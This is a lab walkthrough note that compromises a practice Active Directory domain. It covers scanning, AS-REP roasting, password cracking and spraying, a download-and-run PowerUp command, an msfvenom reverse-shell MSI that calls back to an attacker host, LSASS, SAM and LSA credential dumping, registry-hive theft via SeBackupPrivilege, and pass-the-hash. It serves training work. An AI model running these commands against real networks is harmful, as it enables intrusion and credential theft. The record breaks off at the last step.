// notes/ Practice Boxes
🏛️

AD Chain 03 — Blueprint AD-Chains

sudo ip addr flush dev eth1

#blueprint ad-chains#adchain#walkthrough#boxes#os:windows#os:linux#tech:active-directory#tech:password-attack

AD Chain 03 — Blueprint AD-Chains

🐺 howlsec@kali
$#Configure Chain so you can see it
$sudo ip addr flush dev eth1
$sudo ip addr add 10.0.2.10/24 dev eth1
$sudo ip link set dev eth1 up
$sudo ip route add 10.0.2.0/24 dev eth1

Information Gathering

🐺 howlsec@kali
$nxc smb 10.0.2.0/24
$SMB 10.0.2.4 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack-academy.local) (signing:True) (SMBv1:False)
$SMB 10.0.2.7 445 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-1) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Port Enumeration

🐺 howlsec@kali
$#Credentials lfoster : Pindrop#1
$nmap -p- -Pn -iL ips -v --min-rate 1000 --max-rtt-timeout 1000ms --max-retries 5 -oN nmap_ports.txt && sleep 5 && nmap -Pn -iL ips -sV -sC -v -oN nmap_sVsC.txt
$
$#DC (10.0.2.4)
$PORT STATE SERVICE VERSION
$53/tcp open domain Simple DNS Plus
$88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-15 07:26:31Z)
$135/tcp open msrpc Microsoft Windows RPC
$139/tcp open netbios-ssn Microsoft Windows netbios-ssn
$389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hack-academy.local, Site: Default-First-Site-Name)
$445/tcp open microsoft-ds?
$464/tcp open kpasswd5?
$593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
$636/tcp open tcpwrapped
$3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hack-academy.local, Site: Default-First-Site-Name)
$3269/tcp open tcpwrapped
$5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
$|_http-title: Not Found
$|_http-server-header: Microsoft-HTTPAPI/2.0
$MAC Address: 08:00:27:40:1A:93 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
$Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
$
$Host script results:
$| nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:40:1a:93 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
$| Names:
$| DC01<00> Flags: <unique><active>
$| HACK-ACADEMY<00> Flags: <group><active>
$| HACK-ACADEMY<1c> Flags: <group><active>
$| DC01<20> Flags: <unique><active>
$|_ HACK-ACADEMY<1b> Flags: <unique><active>
$|_clock-skew: 2h59m59s
$| smb2-security-mode:
$| 3:1:1:
$|_ Message signing enabled and required
$| smb2-time:
$| date: 2026-02-15T07:26:31
$|_ start_date: N/A
$
$#CLIENT 1 (10.0.2.7)
$PORT STATE SERVICE VERSION
$135/tcp open msrpc Microsoft Windows RPC
$139/tcp open netbios-ssn Microsoft Windows netbios-ssn
$445/tcp open microsoft-ds?
$3389/tcp open ms-wbt-server Microsoft Terminal Services
$| ssl-cert: Subject: commonName=Client-1.hack-academy.local
$| Issuer: commonName=Client-1.hack-academy.local
$| Public Key type: rsa
$| Public Key bits: 2048
$| Signature Algorithm: sha256WithRSAEncryption
$| Not valid before: 2026-02-14T07:20:12
$| Not valid after: 2026-08-16T07:20:12
$| MD5: f052:75aa:fc01:f187:6431:e5de:e0b6:10d4
$|_SHA-1: a25c:d3f5:47ef:ff41:a8b8:dbfc:af32:87a4:af48:a0bc
$|_ssl-date: 2026-02-15T04:27:15+00:00; +2s from scanner time.
$| rdp-ntlm-info:
$| Target_Name: HACK-ACADEMY
$| NetBIOS_Domain_Name: HACK-ACADEMY
$| NetBIOS_Computer_Name: CLIENT-1
$| DNS_Domain_Name: hack-academy.local
$| DNS_Computer_Name: Client-1.hack-academy.local
$| Product_Version: 10.0.19041
$|_ System_Time: 2026-02-15T04:26:33+00:00
$5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
$|_http-server-header: Microsoft-HTTPAPI/2.0
$|_http-title: Not Found
$MAC Address: 08:00:27:80:1D:57 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
$Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
$
$Host script results:
$|_clock-skew: mean: 1s, deviation: 0s, median: 1s
$| nbstat: NetBIOS name: CLIENT-1, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:80:1d:57 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
$| Names:
$| CLIENT-1<00> Flags: <unique><active>
$| HACK-ACADEMY<00> Flags: <group><active>
$|_ CLIENT-1<20> Flags: <unique><active>
$| smb2-time:
$| date: 2026-02-15T04:26:34
$|_ start_date: N/A
$| smb2-security-mode:
$| 3:1:1:
$|_ Message signing enabled but not required
$
$#CLIENT 1 (10.0.2.9)
$PORT STATE SERVICE VERSION
$135/tcp open msrpc Microsoft Windows RPC
$139/tcp open netbios-ssn Microsoft Windows netbios-ssn
$445/tcp open microsoft-ds?
$3389/tcp open ms-wbt-server Microsoft Terminal Services
$| rdp-ntlm-info:
$| Target_Name: HACK-ACADEMY
$| NetBIOS_Domain_Name: HACK-ACADEMY
$| NetBIOS_Computer_Name: CLIENT-2
$| DNS_Domain_Name: hack-academy.local
$| DNS_Computer_Name: Client-2.hack-academy.local
$| Product_Version: 10.0.19041
$|_ System_Time: 2026-02-15T04:26:28+00:00
$|_ssl-date: 2026-02-15T04:27:16+00:00; +3s from scanner time.
$| ssl-cert: Subject: commonName=Client-2.hack-academy.local
$| Issuer: commonName=Client-2.hack-academy.local
$| Public Key type: rsa
$| Public Key bits: 2048
$| Signature Algorithm: sha256WithRSAEncryption
$| Not valid before: 2026-02-14T07:20:20
$| Not valid after: 2026-08-16T07:20:20
$| MD5: 70ec:56d5:8115:ac6a:c092:7e38:bf1a:6c64
$|_SHA-1: 5589:bbe8:c102:b309:a895:a63f:12b0:c9a3:b43f:939e
$5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
$|_http-title: Not Found
$|_http-server-header: Microsoft-HTTPAPI/2.0
$MAC Address: 08:00:27:6C:31:CF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
$Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
$
$Host script results:
$| smb2-time:
$| date: 2026-02-15T04:26:28
$|_ start_date: N/A
$|_clock-skew: mean: -2s, deviation: 4s, median: -5s
$| nbstat: NetBIOS name: CLIENT-2, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:6c:31:cf (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
$| Names:
$| CLIENT-2<00> Flags: <unique><active>
$| HACK-ACADEMY<00> Flags: <group><active>
$|_ CLIENT-2<20> Flags: <unique><active>
$| smb2-security-mode:
$| 3:1:1:
$|_ Message signing enabled but not required
$
$NSE: Script Post-scanning.
$Initiating NSE at 23:27
$Completed NSE at 23:27, 0.00s elapsed
$Initiating NSE at 23:27
$Completed NSE at 23:27, 0.00s elapsed
$Initiating NSE at 23:27
$Completed NSE at 23:27, 0.00s elapsed
$Read data files from: /usr/share/nmap
$Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
$Nmap done: 3 IP addresses (3 hosts up) scanned in 59.29 seconds
$ Raw packets sent: 5996 (263.776KB) | Rcvd: 40 (1.712KB)

Get All domain users with ldap — Check for Descriptions

🐺 howlsec@kali
$nxc smb 10.0.2.4 -u lfoster -p 'Pindrop#1' --users
$SMB 10.0.2.4 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack-academy.local) (signing:True) (SMBv1:False)
$SMB 10.0.2.4 445 DC01 [+] hack-academy.local\lfoster:Pindrop#1
$SMB 10.0.2.4 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
$SMB 10.0.2.4 445 DC01 Administrator 2025-11-18 19:12:30 0 Built-in account for administering the computer/domain
$SMB 10.0.2.4 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
$SMB 10.0.2.4 445 DC01 krbtgt 2025-08-24 17:08:23 0 Key Distribution Center Service Account
$SMB 10.0.2.4 445 DC01 lfoster 2025-11-18 19:12:30 0
$SMB 10.0.2.4 445 DC01 amorales 2025-11-18 19:12:30 0
$SMB 10.0.2.4 445 DC01 njenkins 2025-11-18 19:12:30 0
$SMB 10.0.2.4 445 DC01 icruz 2025-11-18 19:12:30 0
$SMB 10.0.2.4 445 DC01 lhayes 2025-11-18 19:12:30 0
$SMB 10.0.2.4 445 DC01 msimmons 2025-11-18 19:12:30 0
$SMB 10.0.2.4 445 DC01 egray 2025-11-18 19:12:30 0
$SMB 10.0.2.4 445 DC01 aprice 2025-11-18 19:12:30 0
$SMB 10.0.2.4 445 DC01 lrivera 2025-11-18 19:12:30 0
$SMB 10.0.2.4 445 DC01 cscott 2025-11-18 19:12:30 0
$SMB 10.0.2.4 445 DC01 jbailey 2025-11-18 19:12:31 0
$SMB 10.0.2.4 445 DC01 gturner 2025-11-18 19:12:31 0
$SMB 10.0.2.4 445 DC01 bparker 2025-11-18 19:12:31 0
$SMB 10.0.2.4 445 DC01 zbutler 2025-11-18 19:12:31 0
$SMB 10.0.2.4 445 DC01 hkelly 2025-11-18 19:12:31 0
$SMB 10.0.2.4 445 DC01 eramirez 2025-11-18 19:12:31 0
$SMB 10.0.2.4 445 DC01 jwarren 2025-11-18 19:12:31 0
$SMB 10.0.2.4 445 DC01 lpowell 2025-11-18 19:12:31 0
$SMB 10.0.2.4 445 DC01 adiaz 2025-11-18 19:12:31 0
$SMB 10.0.2.4 445 DC01 nhoward 2025-11-18 19:12:31 0
$SMB 10.0.2.4 445 DC01 [*] Enumerated 23 local users: HACK-ACADEMY
$
$
$nxc smb 10.0.2.4 -u lfoster -p 'Pindrop#1' --users | fgrep -v '[' | fgrep -vi '-Username-' | awk '{print$ 5}' | tee users
$Administrator
$Guest
$krbtgt
$lfoster
$amorales
$njenkins
$icruz
$lhayes
$msimmons
$egray
$aprice
$lrivera
$cscott
$jbailey
$gturner
$bparker
$zbutler
$hkelly
$eramirez
$jwarren
$lpowell
$adiaz
$nhoward

Check For Shares

🐺 howlsec@kali
$nxc smb 10.0.2.4 -u lfoster -p 'Pindrop#1' --shares
$SMB 10.0.2.4 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack-academy.local) (signing:True) (SMBv1:False)
$SMB 10.0.2.4 445 DC01 [+] hack-academy.local\lfoster:Pindrop#1
$SMB 10.0.2.4 445 DC01 [*] Enumerated shares
$SMB 10.0.2.4 445 DC01 Share Permissions Remark
$SMB 10.0.2.4 445 DC01 ----- ----------- ------
$SMB 10.0.2.4 445 DC01 ADMIN$ Remote Admin
$SMB 10.0.2.4 445 DC01 C$ Default share
$SMB 10.0.2.4 445 DC01 IPC$ READ Remote IPC
$SMB 10.0.2.4 445 DC01 NETLOGON READ Logon server share
$SMB 10.0.2.4 445 DC01 SYSVOL READ Logon server share

Grab Bloodhound data

🐺 howlsec@kali
$netexec ldap 10.0.2.4 -u lfoster -p 'Pindrop#1' --bloodhound --collection All --dns-server 10.0.2.4
$LDAP 10.0.2.4 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hack-academy.local)
$LDAP 10.0.2.4 389 DC01 [+] hack-academy.local\lfoster:Pindrop#1
$LDAP 10.0.2.4 389 DC01 Resolved collection methods: dcom, group, rdp, trusts, session, localadmin, psremote, container, objectprops, acl
$LDAP 10.0.2.4 389 DC01 Done in 00M 01S
$LDAP 10.0.2.4 389 DC01 Compressing output into /home/kali/.nxc/logs/DC01_10.0.2.4_2026-02-15_004043_bloodhound.zip
$
$┌──(kali㉿kali)-[~/AD-chain3]
$└─$ cp /home/kali/.nxc/logs/DC01_10.0.2.4_2026-02-15_004043_bloodhound.zip /tmp

Run Bloodhound

🐺 howlsec@kali
$curl -L https://ghst.ly/getbhce -o docker-compose.yml
$sudo docker-compose pull && sudo docker-compose up -d
$sudo docker-compose logs bloodhound | grep -i passw
$
$#If password doesnt work, reset it like this
$sudo docker-compose down -v
$sudo rm .env
$sudo docker-compose up -d

(screenshot omitted) ADIAZ is vulnerable to As-rep roasting (screenshot omitted) Now got As-rep Roasting on Adiaz and cracked his hash with John

🐺 howlsec@kali
$impacket-GetNPUsers hack-academy.local/ -dc-ip 10.0.2.4 -usersfile users -outputfile hashes.txt
$#YOU CAN ALSO CHECK IT WITH NXC
$nxc ldap 10.0.2.4 -u users -p '' -k --dns-server 10.0.2.4 --asrep hash
$Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
$
$[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
$[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
$[-] User lfoster doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User amorales doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User njenkins doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User icruz doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User lhayes doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User msimmons doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User egray doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User aprice doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User lrivera doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User cscott doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User jbailey doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User gturner doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User bparker doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User zbutler doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User hkelly doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User eramirez doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User jwarren doesn't have UF_DONT_REQUIRE_PREAUTH set
$[-] User lpowell doesn't have UF_DONT_REQUIRE_PREAUTH set
$$krb5asrep$23$adiaz@HACK-ACADEMY.LOCAL:0242d161c7dbc51391a9ccbb605c8445$9386ed5538b136c9ab46d6dc2bbc475e188a3a5c1585195d42e49c0971fc8c70844ff267da05ee8ec4756a7ba5c03bcb588cf2a472babe7f930710f43feb4651172d0a77e916a7014687384db119ba03aa432afdfc8310938faec481103499956099d329a8e7b5253e28683c3a82f14743c2088f89edc41af60879998c5b2925a321b8751f0a8a9e33428c1d19b50f56b0de1f571f7bb6e9870f3ca96516d27b6806ea8b42b7176fbdce18d7492a949bf0ebf71fe07a697d3129e05a06da9e461973966a233bcfdbc04af3ff622118c07ee4cfb09877da1366c6d0bbb5a524c980cc6e894a1ed7843ed4927d27b19b93cb22d7dc9c08864d

John Output —> adiaz : Peru123.

🐺 howlsec@kali
$john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
$Using default input encoding: UTF-8
$Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
$Will run 8 OpenMP threads
$Press 'q' or Ctrl-C to abort, almost any other key for status
$Peru123. ($krb5asrep$23$adiaz@HACK-ACADEMY.LOCAL)
$1g 0:00:00:01 DONE (2026-02-15 00:51) 0.7936g/s 1669Kp/s 1669Kc/s 1669KC/s Popadic3..Passion7
$Use the "--show" option to display all of the cracked passwords reliably
$Session completed.
$

Now I sprayed all the protocols and found out that I can log in with adiaz on Client2 via RDP

🐺 howlsec@kali
$nxc rdp ips -u users -p passwords --continue-on-success
$RDP 10.0.2.9 3389 CLIENT-2 [+] hack-academy.local\lfoster:Pindrop#1 (Pwn3d!)
$RDP 10.0.2.9 3389 CLIENT-2 [+] hack-academy.local\adiaz:Peru123. (Pwn3d!)
$RDP 10.0.2.7 3389 CLIENT-1 [+] hack-academy.local\lfoster:Pindrop#1
$RDP 10.0.2.7 3389 CLIENT-1 [+] hack-academy.local\adiaz:Peru123.

Logged in via RDP to Client2

🐺 howlsec@kali
$xfreerdp3 /v:10.0.2.9 /u:'adiaz' /p:'Peru123.' /cert:ignore /dynamic-resolution /drive:linux,/opt/ +clipboard

(screenshot omitted) Transfered PowerUp and tried Privesc

🐺 howlsec@kali
$wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Privesc/PowerUp.ps1
$#Since I dont have internet on the box I hosted it on my kali and transfered
$powershell.exe -c "wget -useb 10.0.2.10/PowerUp.ps1 | iex; Invoke-AllChecks"

(screenshot omitted) This is privesc (screenshot omitted) Create malicious shell on your Kali

🐺 howlsec@kali
$msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.13.31.108 LPORT=443 -f msi -o reverse.msi
$#Then transfer it on windows and execute
$powershell.exe -c "wget -useb 10.0.2.10/reverse.msi -o reverse.msi"
$.\reverse.msi

Got a shell with nt\authority! (screenshot omitted) Now we dump all the hashes! First make adiaz local administrator and then dump them remotely!

🐺 howlsec@kali
$net localgroup "administrators" adiaz /add

(screenshot omitted) Now dump hashes with netexec sam, lsassy, lsa, nanodump

🐺 howlsec@kali
$nxc smb 10.0.2.9 -u 'adiaz' -p 'Peru123.' --sam
$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\adiaz:Peru123. (Pwn3d!)
$SMB 10.0.2.9 445 CLIENT-2 [*] Dumping SAM hashes
$SMB 10.0.2.9 445 CLIENT-2 Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$SMB 10.0.2.9 445 CLIENT-2 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$SMB 10.0.2.9 445 CLIENT-2 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$SMB 10.0.2.9 445 CLIENT-2 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:cb02bc3b3782d63acca9a324d035d768:::
$SMB 10.0.2.9 445 CLIENT-2 Julia:1001:aad3b435b51404eeaad3b435b51404ee:e618ab47ea4179bb6199a16daff38b5b:::
$SMB 10.0.2.9 445 CLIENT-2 [+] Added 5 SAM hashes to the database
$
$nxc smb 10.0.2.9 -u 'adiaz' -p 'Peru123.' -M lsassy
$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\adiaz:Peru123. (Pwn3d!)
$LSASSY 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\adiaz 5f05c1e6e2a840c9b2abed9e9b9b4a9e
$LSASSY 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\lfoster 70a4dad48e974c160e1de338df76435d
$
$nxc smb 10.0.2.9 -u 'adiaz' -p 'Peru123.' -M nanodump
$[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\adiaz:Peru123. (Pwn3d!)
$NANODUMP 10.0.2.9 445 CLIENT-2 [*] 64-bit Windows detected.
$NANODUMP 10.0.2.9 445 CLIENT-2 [+] Created file nano.exe on the \\C$\Windows\Temp\
$NANODUMP 10.0.2.9 445 CLIENT-2 [*] Getting LSASS PID via command tasklist /v /fo csv | findstr /i "lsass"
$SMB 10.0.2.9 445 CLIENT-2 [-] WMIEXEC: Dcom initialization failed on connection with stringbinding: "ncacn_ip_tcp:10.0.2.9[49667]", please increase the timeout with the option "--dcom-timeout". If it's still failing maybe something is blocking the RPC connection, try another exec method
$NANODUMP 10.0.2.9 445 CLIENT-2 [*] Executing command C:\Windows\Temp\nano.exe --pid 592 --write C:\Windows\Temp\20260215_0138.log
$SMB 10.0.2.9 445 CLIENT-2 [-] WMIEXEC: Dcom initialization failed on connection with stringbinding: "ncacn_ip_tcp:10.0.2.9[49667]", please increase the timeout with the option "--dcom-timeout". If it's still failing maybe something is blocking the RPC connection, try another exec method
$NANODUMP 10.0.2.9 445 CLIENT-2 [+] Process lsass.exe was successfully dumped
$NANODUMP 10.0.2.9 445 CLIENT-2 [*] Copying 20260215_0138.log to host
$NANODUMP 10.0.2.9 445 CLIENT-2 [+] Dumpfile of lsass.exe was transferred to /tmp/CLIENT-2_64_hack-academy.local.log
$NANODUMP 10.0.2.9 445 CLIENT-2 [+] Deleted nano file on the C$ share
$NANODUMP 10.0.2.9 445 CLIENT-2 [+] Deleted lsass.dmp file on the C$ share
$NANODUMP 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\adiaz:5f05c1e6e2a840c9b2abed9e9b9b4a9e
$NANODUMP 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\lfoster:70a4dad48e974c160e1de338df76435d
$
$nxc smb 10.0.2.9 -u 'adiaz' -p 'Peru123.' --lsa
$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)
$SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\adiaz:Peru123. (Pwn3d!)
$SMB 10.0.2.9 445 CLIENT-2 [+] Dumping LSA secrets
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY.LOCAL/Administrator:$DCC2$10240#Administrator#98827453f7494d0432f040c44ed08de4: (2025-09-03 00:58:04)
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY.LOCAL/adiaz:$DCC2$10240#adiaz#10f1e14dec769d19345be8e5516c67e9: (2026-02-15 05:58:15)
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY.LOCAL/jbailey:$DCC2$10240#jbailey#0860c5817e76d3945bd7bc8c9a188adc: (2025-08-30 13:05:10)
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY.LOCAL/lfoster:$DCC2$10240#lfoster#a8af829d97b2a60a0dc40a6b062edd6f: (2026-02-15 05:55:53)
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\CLIENT-2$:aes256-cts-hmac-sha1-96:a6d6408625f4bb01993517d67531a015aa5934edbeac4ac6b4e6f5a7ad2f72c6
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\CLIENT-2$:aes128-cts-hmac-sha1-96:d2c5311f39efc4cc02765f14f6694fcb
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\CLIENT-2$:des-cbc-md5:6d576b7040e3b586
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\CLIENT-2$:plain_password_hex:c18618a9e696d836680a1a816a650712d4be16594046240c9bc263b3900e0d016b7d20cc020ef469fab6d823d948e7ed32e7022f3544d838027efc1ecaace1f3efb4f03119a79731ba538735f3a391acdb784ab84596bd17400e459f6b7f815897624be0a08687d321f403c6c12d66b45fa24cec837a0bc20d12d576e32c6d43686281c93966bde0b29bf5db23c291caaf5c458f30abc572ecf2bab576963cf133aaa6caad53b12f603f0226d6efed9f5b4ec5f9afa47b0f1bf5b1f624f095086505caf16b9854cb49a55e2039ffaf7d24da5333f5ab0789ac78bd0142c457c56af8e5059b8182378a76aea86ff7173a
$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\CLIENT-2$:aad3b435b51404eeaad3b435b51404ee:846537d155c09278127e4542f7bf3ec1:::
$SMB 10.0.2.9 445 CLIENT-2 dpapi_machinekey:0x0567c35e4dc0d3fb5d2015ba0341053b907b64f1
$dpapi_userkey:0x18dba29d7d5e9a483e3844e96fcd2d5130b52886
$SMB 10.0.2.9 445 CLIENT-2 [+] Dumped 10 LSA secrets to /home/kali/.nxc/logs/lsa/CLIENT-2_10.0.2.9_2026-02-15_013936.secrets and /home/kali/.nxc/logs/lsa/CLIENT-2_10.0.2.9_2026-02-15_013936.cached

Now we crack the hashes with john. We got new credentials jbailey : Paulio*3

🐺 howlsec@kali
$john --wrodlist=/usr/share/wordlists/rockyou.txt --format=mscash2 mscash_hashes

(screenshot omitted) Now you can remove adiaz from administrators

🐺 howlsec@kali
$net localgroup "administrators" adiaz /del

Now we have to spray around again

🐺 howlsec@kali
$nxc winrm ips -u users -p passwords --continue-on-success
$WINRM 10.0.2.7 5985 CLIENT-1 [+] hack-academy.local\jbailey:Paulio*3 (Pwn3d!)
$#jbailey has winrm on Client 1

Run winrm and enumerate Client 1

🐺 howlsec@kali
$evil-winrm -i 10.0.2.7 -u 'jbailey' -p 'Paulio*3'
$
$Evil-WinRM shell v3.7
$
$Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
$
$Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
$
$Info: Establishing connection to remote endpoint
$*Evil-WinRM* PS C:\Users\jbailey\Documents> whoami /all
$
$USER INFORMATION
$----------------
$
$User Name SID
$==================== ==============================================
$hack-academy\jbailey S-1-5-21-1516340173-3939677173-1136271741-1115
$
$GROUP INFORMATION
$-----------------
$
$Group Name Type SID Attributes
$==================================== ================ ============ ==================================================
$Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
$BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
$BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
$BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
$NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
$NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
$NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
$NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
$Mandatory Label\High Mandatory Level Label S-1-16-12288
$
$PRIVILEGES INFORMATION
$----------------------
$
$Privilege Name Description State
$============================= ==================================== =======
$SeBackupPrivilege Back up files and directories Enabled
$SeRestorePrivilege Restore files and directories Enabled
$SeShutdownPrivilege Shut down the system Enabled
$SeChangeNotifyPrivilege Bypass traverse checking Enabled
$SeUndockPrivilege Remove computer from docking station Enabled
$SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
$SeTimeZonePrivilege Change the time zone Enabled
$
$USER CLAIMS INFORMATION
$-----------------------
$
$User claims unknown.
$
$Kerberos support for Dynamic Access Control on this device has been disabled.
$

We got a shell and potential privesc! (screenshot omitted) Privesc with SeBackupPrivilege

🐺 howlsec@kali
$Evil-WinRM* PS C:\Users\jbailey\Documents> cd c:\
$*Evil-WinRM* PS C:> mkdir temp
$
$ Directory: C:\
$
$Mode LastWriteTime Length Name
$---- ------------- ------ ----
$d----- 2/14/2026 11:23 PM temp
$
$*Evil-WinRM* PS C:> cd temp
$*Evil-WinRM* PS C:\temp> reg save hklm\sam c:\Temp\sam
$The operation completed successfully.
$
$*Evil-WinRM* PS C:\temp> reg save hklm\system c:\Temp\system
$The operation completed successfully.
$
$*Evil-WinRM* PS C:\temp> download sam
$
$Info: Downloading C:\temp\sam to sam
$
$Info: Download successful!
$*Evil-WinRM* PS C:\temp> download system
$The term 'download' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
$At line:1 char:2
$+ download system
$+ ~~~~~~~~
$ + CategoryInfo : ObjectNotFound: (download:String) [], CommandNotFoundException
$ + FullyQualifiedErrorId : CommandNotFoundException
$*Evil-WinRM* PS C:\temp> download system
$
$Info: Downloading C:\temp\system to system
$
$Info: Download successful!
$*Evil-WinRM* PS C:\temp>
$
🐺 howlsec@kali
$impacket-secretsdump -system system -sam sam local
$Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
$
$[*] Target system bootKey: 0xbacf965a2426afda3d2207e4d6aa3904
$[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
$Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:156e3de3d13ba510e8c2b62f4f5d0216:::
$Brian:1001:aad3b435b51404eeaad3b435b51404ee:a14e59515478dc73bab72add13f6c3a9:::
$[*] Cleaning up...

Try local auth with hashes!!

🐺 howlsec@kali
$nxc smb 10.0.2.7 -u Administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0 --local-auth
$SMB 10.0.2.7 445 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-1) (domain:CLIENT-1) (signing:False) (SMBv1:False)
